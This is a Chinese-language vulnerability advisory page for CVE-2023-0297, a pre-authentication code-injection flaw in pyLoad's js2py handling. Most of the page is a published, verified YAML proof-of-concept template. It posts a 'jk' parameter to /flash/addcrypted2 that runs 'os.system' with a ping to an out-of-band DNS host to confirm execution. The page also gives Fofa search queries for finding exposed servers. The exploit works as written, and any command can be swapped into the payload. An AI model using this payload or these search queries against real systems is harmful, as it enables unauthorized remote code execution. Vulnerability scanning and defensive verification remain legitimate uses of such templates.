CVE-2023-0297: pyLoad未授权远程代码执行漏洞CVE-2023-0297/CNNVD-202301-1121

日期: 2025-09-01 | 影响软件: pyLoad | POC: 已公开

漏洞描述

pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意Python代码。 影响版本 pyLoad <= 0.4.20 另外,小于0.5.0b3.dev31版本的pyLoad开发版本也受此漏洞影响。 Fofa: icon_hash="77699822" || icon_hash="-272805727" || icon_hash="2055939329"

PoC代码[已公开]

id: CVE-2023-0297

info:
  name: pyLoad未授权远程代码执行漏洞CVE-2023-0297/CNNVD-202301-1121
  author: daffainfo
  severity: critical
  verified: true
  description: |-
    pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意Python代码。
    影响版本 pyLoad <= 0.4.20 另外,小于0.5.0b3.dev31版本的pyLoad开发版本也受此漏洞影响。
    Fofa: icon_hash="77699822" || icon_hash="-272805727" || icon_hash="2055939329"
  reference:
    - https://mp.weixin.qq.com/s/nwR3b678vrp_7ptGZv-mbg
    - https://mp.weixin.qq.com/s/MwN8XFPPeO__gpsQXHbiMA
    - https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
    - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
  tags: cve,cve2023,pyload,rce
  created: 2024/02/26

set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /flash/addcrypted2
      body: |
        jk=pyimport%20os;os.system("ping%20{{oobDNS}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()

相关漏洞推荐